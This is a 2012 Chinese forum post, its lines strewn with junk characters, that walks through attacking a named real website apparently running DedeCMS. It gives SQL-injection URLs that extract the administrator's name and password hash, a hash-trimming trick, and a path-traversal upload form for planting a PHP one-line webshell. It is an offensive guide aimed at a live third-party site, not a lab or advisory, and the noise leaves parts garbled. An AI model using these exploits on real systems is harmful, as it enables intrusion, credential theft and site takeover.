①注入漏洞。' ?1 o) X- @# |6 }4 B) {
这站 http://www.political-security.com/" f# J; u: {4 S* N# X: [
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,
# s) `! I4 \5 V v+ ~www.political-security.com/data/mysql_error_trace.inc 爆后台, p% B$ R( E U3 z
然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。: Y: I9 G1 J. o8 b
然后写上语句
$ v' T$ h+ ~. u# D3 h! {查看管理员帐号6 v3 X0 f5 P- @# ]+ e
http://www.political-security.co ... &membergroup=@`# U$ e/ U; T6 Y; y4 |+ B2 \
]9 U$ P j6 w+ c& |admin
5 X# D8 }$ @: e) u4 R9 b, E! W) w5 a0 c2 h( y7 a* u9 r3 H$ Q
查看管理员密码
0 T- `: g8 a* u8 W! T/ R http://www.political-security.co ... &membergroup=@`
, D! J2 H8 }0 s! L
# e+ H5 d( E1 ?9 W8d29b1ef9f8c5a5af429* k+ ?1 H7 H" z! T
' h% _! E; h: u: j$ Z
查看管理员密码
/ z$ u# Y$ O9 q% ]3 H6 W T
) m6 p. f, q4 W7 k) s得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD54 b! M7 M' R0 I2 i3 k8 [, R) T
, ]0 E" N/ F% ]( j! ]8 u' M& U
8d2- D- e" r) Y9 p
9b1ef9f8c5a5af42: R' a% d. }2 a9 r: W' X% m
95 C7 l% ^( b- \! |* s
$ n7 }5 J8 j& }/ W# S' f. x4 acmd5没解出来 只好测试第二个方法
0 k' g6 w) a- W! e. i
; T z1 H1 ` `8 n; b
. J; x1 @7 E6 Q- \% h) v②上传漏洞:
& E; |! Z" B" T! c0 [# V5 q
- S" n( Y3 X5 p只要登陆会员中心,然后访问页面链接; k r. {, d1 N
“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”
1 l) ^5 I0 d$ I- h5 k }9 _% L7 I1 |( d" o+ M; K w
如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”
7 b9 \3 q* X V7 t- y, u" y
2 u, K" m$ c! S2 Y: b# F$ T于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm
& {/ f2 Y" l2 P1 p) K% G+ k# Z# P% p% l, h) K' c8 L. c
<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>
9 o/ t7 A/ H2 {) z* [或者5 {: P9 B6 S/ t
即可上传成功 |
发表于 2012-9-13 10:56:59
收藏
支持
反对